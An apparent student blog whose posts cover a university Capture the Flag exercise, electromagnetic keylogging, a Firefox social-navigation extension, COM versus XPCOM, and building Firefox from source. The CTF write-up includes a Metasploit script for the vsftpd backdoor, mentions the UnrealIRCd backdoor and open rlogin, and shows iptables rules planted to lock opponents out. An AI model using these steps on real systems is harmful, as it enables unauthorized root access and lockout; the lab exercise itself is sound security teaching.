Capture The Flag at Royal Holloway


On Monday 25th of March, a Capture the Flag (CTF) competition took place at Royal Holloway as part of the Security Testing course. Due to the Spring break, on-site participation was limited to 10 people, but anyone interested was free to take part remotely. Fortunately, we were able to form three teams of four people each and shared the laboratory space. Two of my teammates were going to participate remotely, which initially seemed like a drawback.

First, the professor described the rules and restrictions of the game, as well as the scoring system that would be used.

The Scenario

Each team owned a BackTrack machine and a Server. The Server was a modified Metasploitable, which was easy to figure out from some known vulnerable applications like TikiWiki. Moreover, we had to choose a secret phrase and a big secret phrase (the flags), which the operator of the event placed somewhere in our systems. The teams were allowed to attack each other in order to gain access to the opponents' servers using all appropriate means, but there were some restrictions on defensive techniques: no denial of service and no system reboots were allowed.

As for the scoring system, we earned:

  • 1 point for each leaked password
  • 3 points for each secret phrase
  • 5 points for each big secret phrase

In addition, the respective points were deducted from any team whose passwords, secret or big secret phrases were revealed.

Obviously, the aim of the CTF was to collect the highest number of points! To achieve this, we planned to attack as soon as possible while also trying to strengthen our defence. In the rest of the post I describe our team's efforts.

The Game

Before the CTF event, we thought we would be given enough time to prepare our Server in order to reduce its vulnerabilities (exploitable applications and misconfigurations). However, that assumption proved wrong, and we had to attack and defend simultaneously. First of all, we listed the running processes on our machine in order to identify the vulnerable ones and fix them. At the same time, we scanned the network for the opponents' machines, trying to fingerprint the versions of their running applications so we could search for any available exploits.

Each Server had a number of users (e.g. ftp, service) and there was also a special user (ours was 'daisy') with a probably weak password, vulnerable to brute-force attacks. Our first priority was to change these passwords to stronger ones. The first attack was performed against the vsftpd (Very Secure FTP Daemon) service using an exploit from Metasploit (vsftpd_234_backdoor), which returned a shell with root privileges. It was then easy to retrieve the secrets and big secrets of the other teams, gaining our first points and taking the lead on the scoreboard.
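For the record, the attack amounted to little more than the following Metasploit resource script; the target address below is a made-up example, not one of the actual lab IPs:

```text
# vsftpd_234_backdoor sketch -- the RHOST value is hypothetical
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.56.101
exploit
```

Saved as, say, vsftpd.rc, it can be replayed with msfconsole -r vsftpd.rc. A session opened this way is already root, so no privilege escalation step was needed.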

In the meantime, we were looking for a way to protect our own machine against the same exploit by adjusting the service's configuration to close the hole.

Unfortunately, the Servers allowed rlogin connections for any user (even root) without a password. By the time we fixed this issue (by removing the .rhosts files from the users' home folders so that a password would be requested), our system was already compromised (the netstat list of TCP connections was on fire!). From then on, every team was able to acquire the others' secrets, so after an hour and a half we were all even.
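The fix itself was a one-liner. Here is a sketch that demonstrates it against a scratch directory (on the real Server the search root was /home, and the user names below are examples):

```shell
# Set up a scratch "home" tree with trust files, standing in for /home.
HOME_ROOT=$(mktemp -d)
mkdir -p "$HOME_ROOT/daisy" "$HOME_ROOT/service"
touch "$HOME_ROOT/daisy/.rhosts" "$HOME_ROOT/service/.rhosts"

# The actual fix: delete every per-user .rhosts, so rlogin falls back
# to asking for a password instead of trusting listed remote hosts.
find "$HOME_ROOT" -maxdepth 2 -name .rhosts -delete

# Verify nothing is left behind.
remaining=$(find "$HOME_ROOT" -name .rhosts | wc -l)
echo "$remaining"
```

Disabling the rlogin service entirely would have been stronger, but removing the trust files was the quickest change that stayed within the rules.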

One of the teams tried to block access using iptables, an incident that was reported, so they lost some points. Their action gave us the idea to modify the other Servers' iptables rules, adding entries that allowed access to their systems only from our machines (BackTrack and Server)! For a while they were confused, which gave us enough time to prepare our system and our next attack. Another vulnerability was found in the IRC service (running on port 6667), which was also exploitable through Metasploit (unreal_ircd_3281_backdoor), giving us root access to the other teams' Servers. Although we knew about these vulnerabilities, we were not able to fix some of them (such as the IRC one) on our own machine.
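In iptables-restore syntax, the rule set we planted on a compromised Server looked roughly like the fragment below; both addresses are hypothetical stand-ins for our BackTrack and Server machines:

```text
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -s 10.0.0.11 -j ACCEPT
-A INPUT -s 10.0.0.12 -j ACCEPT
COMMIT
```

With a default DROP policy on INPUT, only our two machines could reach the victim's services over the network; everyone else, including the Server's owners, was locked out until they noticed and flushed the rules.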

After the break, the operator of the event asked for new big secrets and placed them on our machines. Soon all the systems were compromised again and the new big secrets were revealed. Nevertheless, we kept looking for new weaknesses, in case we could gain points for the variety of our attacks. Some members of the team were trying to exploit an NFS misconfiguration that allowed shared folders to be mounted from other servers, when the professor announced that the winner would be whoever first unzipped a password-protected zip file placed at a certain location. Using hints located in the same folder, the goal was to find the special user of each Server (like 'daisy') and type their initial letters in alphabetical order. The tricky part was that the letters had to be capitals rather than lowercase!
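The final step can be reproduced with a couple of shell commands. The user names below are invented stand-ins (only 'daisy' was real), so the resulting password here is purely illustrative:

```shell
# One special user per Server -- a hypothetical list; ours really was 'daisy'.
users="daisy hera ken zoe"

# Sort the names alphabetically, take each initial letter, upper-case them.
password=$(printf '%s\n' $users | sort | cut -c1 | tr 'a-z' 'A-Z' | tr -d '\n')
echo "$password"

# The locked file would then open with something like:
# unzip -P "$password" flags.zip
```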

As we were the first team to unzip the file, we won the CTF!! Congratulations to my teammates for our collaboration and efficiency, and to our opponents for their competitiveness!! I would also like to thank our professor for organising the event.

The Experience 

As this was my first CTF event ever, I had been looking forward to participating and giving my best in order to win. Despite the fact that there were only three teams, the level of pressure and competition was high enough that we were able to test and extend our skills and learn which mistakes to avoid in the future. The ability to adapt quickly to changing conditions, and to assess a situation within a limited amount of time before acting, were some of the valuable skills gained through this process. Moreover, it was important that we managed to overcome the communication difficulties caused by collaborating remotely over Skype.

All in all, it was a great experience that we enjoyed together with the rest of the team members as well as with our 'opponents', and I'm looking forward to more to come!!

Electromagnetic keylogger

A keylogger (keystroke logger) is software or hardware used to capture the keystrokes typed on a computer keyboard. Fortunately, if we are careful enough, it is difficult for someone to install such software or such a device on our computers.

A software keylogger can be installed by accidentally or deliberately installing software acquired from an unknown source. On the other hand, installing a hardware keylogger requires the attacker to have physical access to the machine.

Some simple measures to avoid such attacks are:

  • Software keyloggers: It is wise not to install software attached to emails from unknown senders.
  • Hardware keyloggers: Keep an eye on your equipment and on who has access to it.

Alright, if you apply such simple protection measures you are safe. #NOT

Keyboards contain electronic components that emit electromagnetic waves. What happens if someone can capture these waves and decode them in order to reveal the actual message typed?

The answer can be found in the following video, where a real antenna is used to capture the electromagnetic emanations of keystrokes, even from another room!


I wonder what will happen a few years from now, when devices like the "Black Hole" from Prison Break, capable of capturing all transmitted traffic, become available!

The paper for this work is available here and more info can be found at their site.

Well begun is half done.

The beginning is half of everything.
– Pythagoras

The main purpose of registering this blog was to post my progress during my participation in a P2PU (Peer to Peer University) course on Firefox extension development. Since then, I haven't actually posted any updates.

At the same time, I was working on my undergraduate thesis on a similar subject. Fortunately, I graduated and am currently pursuing my Master of Science in Information Security at Royal Holloway, University of London!!

Lately, I have decided to post something new and interesting that I come across here almost every day, in order to achieve one or more of the following:

1. improve my written English
2. keep a diary of interesting and educational things for each day
3. help people solve everyday problems either computer related or not
4. exchange opinions

DISCLAIMER: As my academic background is in Computer Science and my current studies provide me with loads of new and interesting information, most of the subjects will be related to computing or information security. However, that should not be taken as a strict rule.

Whenever you notice something inaccurate, please feel free to send me an email or leave a comment about it. I would really appreciate your comments, whether they are corrections or praise. :)

iClone – Functionality and Screenshots

As I presented in my previous post, iClone is a project that tries to reduce the distance between internet users and encourage them to collaborate with each other in order to get better search results and become more effective. It's like having a network neighbourhood where users interact, share, and take advantage of previous knowledge.

Over the past months I have made progress in transferring the idea of iClone from a standalone app, running only on Windows, to an extension for one of the most well-known and widely used web applications: the Mozilla Firefox web browser.

Firefox is one of the greatest open-source projects, with an enormous number of people involved trying to make the best of it. Fortunately, the material available online is adequate for a beginner in extension development, and the help provided by the folks on the IRC channel is invaluable.

The purpose of this post is to present the basic functionality of the extension and some screenshots of a session.

At first, a user has to register in order to use our service, so a registration page is provided:

Registration pane

Then we log in to the system with the credentials we provided in the previous step, and we can see the main sidebar page, which consists of a Radar panel, where the user's radar and other info appear, and a Share URL panel, where a user can share a link and see those previously shared.

Main Radar Panel

The radar widget is externally provided and developed in HTML5. My own addition is a tooltip with extra info that appears when the mouse is over a certain slice (the onhover event). The active user is always placed at the centre of the radar (the zero point, 0). The bigger a user's slice is, the more of their navigation history overlaps with the active user's.
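As a toy illustration of that proximity metric, here is one way to count the overlap between two users' visited-URL histories with standard tools; the file names and URLs are made up, and the real extension keeps this data on the server side:

```shell
# Two users' browsing histories, one visited URL per line, sorted for comm.
printf '%s\n' news.example.com wiki.example.org mail.example.net | sort > alice.txt
printf '%s\n' wiki.example.org mail.example.net shop.example.com | sort > bob.txt

# Lines common to both files = URLs both users have visited.
overlap=$(comm -12 alice.txt bob.txt | wc -l)
echo "$overlap"   # the bigger this number, the bigger bob's slice on alice's radar
```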

Through the tooltip, we can see how much time has passed since a user's last navigation, and the slice's colour gradient, from light green to red, represents that visually.

Main radar’s tooltip

When a user clicks on a slice of the radar, a second radar appears below the first one, with info about the selected user and their neighbourhood.

Second radar with tooltip

You can also see the neighbours of any user, along with their shared URLs. This option is available when you right-click on the second radar and select "Shared urls" (the last five results appear in a list).

Second radar’s menu

Clicking on a given URL from the list opens it in a new, auto-focused tab. Selecting the "Radar only" option from the same menu makes the "Shared urls" list disappear.

Neighbor’s shared urls

As for the second panel, the user can share new URLs, which can be tagged to make them more informative. They can also retrieve the last five bookmarked URLs (currently manually, with the "Get shared!" button).

Share url panel

That’s all for now. You can find me there, probably asking questions or helping beginners.

iClone – project proposal

General idea

For a place that gathers millions of people, the Web seems pretty lonely at times. It would be nice if we could extend the browser's functionality so that all users could interact with each other, sharing ideas, opinions and information that would make the browsing experience more pleasant and productive.

We build on these observations and focus on enhancing the browsing experience through a process known as social navigation. Social navigation describes the process in which a number of people who share interests and search goals decide to coordinate their efforts. This cooperation, and the fact that more and more users can benefit from it, is what gives the Web the opportunity to "come alive" and creates the concept of a place where all users can communicate (on an informational level). Most importantly, the information will be accessible to every user in real time, so everyone can take advantage of it. In addition, a means of communication should be available for users who are in the same place at the same time, so that they can share their experiences.

For the purposes of our idea, we decided to extend one of the most well-known browsers, Mozilla Firefox, whose open-source orientation can reinforce the wide spread of our application.

System functionality

  • Extend Mozilla Firefox's functionality, offering means of connection, interaction, communication and synchronous information sharing between users.
  • Present an intuitive user interface that can visualize the awareness of other users and their actions.

User scenario

Say a searcher tries to find information about computer games and submits queries about the subject to his favourite search engine. Each time he visits a web page that attracts his interest, it is added to a set that constitutes the user's profile. This profile can be compared with those of other users connected to the system, returning as a result the profiles that are most similar to each other. The system identifies these users and presents them to the searcher in an understandable way (e.g. on a radar), so that the similarity level is clear. As search interests change over time, so does the similarity relationship among the users.

It is clear that the purpose of the system is to present a set of users close to the searcher's interests, a set that can change dynamically depending on their decisions over time. It will also offer the appropriate means of real-time communication, in order to take advantage of direct interaction among the users.


The tools that the system should offer initially are:

  • Radar

A radar in the real world, operating from an object x, scans a wide area, measures the distance of other objects from x, and presents these objects along with their distances from x on a display. In our case, the objects are users and the distance is a metric of user-to-user proximity.

iclone radar

The radar metaphor

  • Private chat
  • Chat (domain-based)
  • Sharing bookmarks

The above idea is based on the iClone project, which has already been implemented as a stand-alone application. All the relevant information can be found in the paper at the end. Our purpose is to transfer the whole functionality of this stand-alone application to Firefox, so that it does not stay trapped within the strict bounds of the original implementation.

iClone stand-alone app


XPCOM, XPIDL, XPFE on Internet Explorer (IE)

We have recently discussed the three parts of Mozilla Firefox that are extremely valuable to the browser's functionality, and it's time to see what alternatives other browsers, such as Microsoft's Internet Explorer and Google Chrome, offer to compete with Firefox's XPCOM, XPIDL and XPFE. During my research, I found it fair to present a browser with a longer history than the newly arrived Chrome, and that is none other than Internet Explorer.

Microsoft’s Internet Explorer (commonly abbreviated to IE) is currently at its 9th beta version, released with great prospects regarding its speed and general functionality. But let’s see what happens under the hood.

Mozilla’s XPCOM alternative

The Component Object Model (COM) is a binary-interface standard for software componentry introduced by Microsoft in 1993. It is used to enable inter-process communication and dynamic object creation across a large range of programming languages. Its main purpose is to implement objects that can be used in environments different from the one in which they were created. Although it doesn't support full cross-platform functionality like XPCOM, it has also been adopted as a standard in Apple's Core Foundation 1.3. The advantage of COM is that you can reuse objects without knowing their implementation, as interface descriptions (IDL) are kept separate from the implementation. Of course, the uniqueness of this technique has been lost, since Mozilla offers exactly the same ease of use with well-defined and readable interfaces (XPIDL).

So we can assume that Internet Explorer also uses a componentized architecture built with technologies like Firefox's, but with a difference in the building blocks. Here we have components, each having its own dynamic-link library (DLL, a major drawback of Microsoft's software) and exposing a set of COM programming interfaces. Personally, I find Firefox's modularity more developer-friendly (not to mention its open-source orientation).

What happens with the code structure?

A COM developer should keep in mind that it's all about components. You create one, describe it with an interface (or multiple interfaces) in a programming language (e.g. C, C++, Delphi), and give each interface a unique identifier to distinguish it.

An interface contains all the methods a programmer needs to access a COM component. Each interface consists of a pointer to a virtual function table (vtable) containing a list of pointers to the functions that implement those declared in the interface, in the same order in which they are declared.
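To make that concrete, a minimal COM interface definition in MIDL might look like the sketch below; the interface name, method and GUID are all invented for illustration:

```text
// greeter.idl -- hypothetical example, compiled with midl.exe
import "unknwn.idl";

[
    object,
    uuid(6B29FC40-CA47-1067-B31D-00DD010662DA)   // made-up GUID
]
interface IGreeter : IUnknown
{
    // Every COM method returns an HRESULT status code.
    HRESULT SayHello([in, string] const wchar_t *name);
};
```

Deriving from IUnknown is what gives the component the standard QueryInterface/AddRef/Release entries at the top of its vtable.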

And what about IDL?

COM has its own mechanism for handling interface files and compiling them into the type libraries (binary metadata files) we already know. The purpose of type libraries is the same as in XPCOM: to maintain compatibility at the binary level, so that client code can find and use the library it needs without worrying about linking to it. To complete this procedure, interfaces are compiled using the Microsoft Interface Definition Language (MIDL) compiler. MIDL itself is a text-based interface description language which, with some extensions, provides the required functionality.

Although COM remains the soul of IE, it has been extended with the .NET Framework, supporting web services and becoming more distributed (through WCF), and one can sense that COM is slowly being deprecated. I would describe .NET as a union of XPCOM, XPIDL and XPFE, offering plenty of languages to work with, such as ASP, C# and JScript.

A few words about the .NET Framework…

The Microsoft .NET Framework is a software framework that manages the execution of programs written specifically for it. It aims to provide language interoperability by binding different languages together (each language can utilize code written in the others), with the restriction that the languages must belong to the set of .NET-supported languages. Part of .NET is a runtime environment known as the Common Language Runtime (CLR), which provides the appearance of an application virtual machine, so that programmers need not consider the capabilities of the specific CPU that will execute the program.

net clr operation

.NET CLR "duty"

But how does COM interact with .NET?

Here comes COM Interop, a component of the .NET Common Language Runtime (CLR) that enables bidirectional object interaction between COM and .NET, so that no changes to existing components are needed and functionality remains smooth. The actions that take place behind the scenes include registration of the COM object, creation of the required type libraries, and implementation of the appropriate method calls. All in all, the whole process is a temporary bridge between the .NET CLR and the actual COM component.

Future plans for .NET

The design of the .NET Framework theoretically allows it to be platform-agnostic, and thus cross-platform compatible: a program written for the framework should run without change on any system for which the framework is implemented. While Microsoft has never implemented the full framework on any system other than Microsoft Windows, the framework is engineered to be platform-agnostic.

As we can conclude from the above (at least until some new, open-minded software implementation appears), cross-platform support is not available for Internet Explorer, so we can only discuss COM and IDL, leaving the "XP" aside. As for XPFE, most of the web-development tools included in the XPFE framework are supported in IE (e.g. JavaScript, CSS, XML), but due to the closed-source policy that prevents out-of-the-box operation on other OSes, it loses its cross-platform character.

All in all, I have concluded that currently the main difference between the two browsers' architectures is that, on the one hand, IE offers language interoperability, while on the other hand Firefox extends that by offering cross-platform, open-source software, which matters most nowadays, when the need for customization keeps growing.

Building Mozilla Firefox (from source)

Mozilla Firefox's source is available through their site, and you can get it via the Mercurial, CVS, or HTTP/FTP repositories. One of the features that distinguishes Firefox's build from other applications is that it is cross-platform, like all of Mozilla's projects, which means you can build it on different platforms. I chose Ubuntu Linux (Lucid, 10.04) because of the ease of use it offers (among other open-source-oriented reasons!). One site you should keep in mind is Tinderbox, to make sure that the product you are working on currently compiles in your environment.

First, I should mention some problems I encountered during my first contact with building Firefox. I got the code from the HTTP/FTP repository, but ran into a problem with the options in the .mozconfig file. This file is important because it passes all the appropriate parameters for compiling the source, and you place it in your home folder. For the Makefile to identify which application you want to compile (in our case Firefox, i.e. the browser), the option ac_add_options --enable-application=browser is needed. But with that source code everything went wrong, so I decided to get the more up-to-date source from the Mercurial repositories, and finally got something working. After my first failed attempt, the main problem was that I couldn't figure out how to use more than one option in the .mozconfig file. The error I continuously get (even now) is: configure: warning: --enable-debug: invalid host type.

After removing all the options (keeping only those necessary for the compile to complete), I got the following build:

mozilla firefox build

Mozilla Firefox successful build

The simple .mozconfig file that I used is:

. $topsrcdir/browser/config/mozconfig
ac_add_options --enable-application=browser
mk_add_options AUTOCONF=autoconf2.13

By using the option mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/obj-@CONFIG_GUESS@ in your .mozconfig file, each time you build the source a new objdir folder is created, where all the generated code and files are placed.
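Putting that together with the working options above, the same minimal .mozconfig with an objdir enabled would read:

```text
. $topsrcdir/browser/config/mozconfig
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/obj-@CONFIG_GUESS@
ac_add_options --enable-application=browser
mk_add_options AUTOCONF=autoconf2.13
```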

firefox build code

Firefox's build source code

Using an objdir means that every Makefile.in in your source tree is turned into a Makefile in the objdir, mirroring the same parent-directory structure. So you can throw away the objdir and build the source from scratch without having to get another copy of the source code.

What’s coming up next? Trying to figure out why I can’t use more options without them conflicting with each other.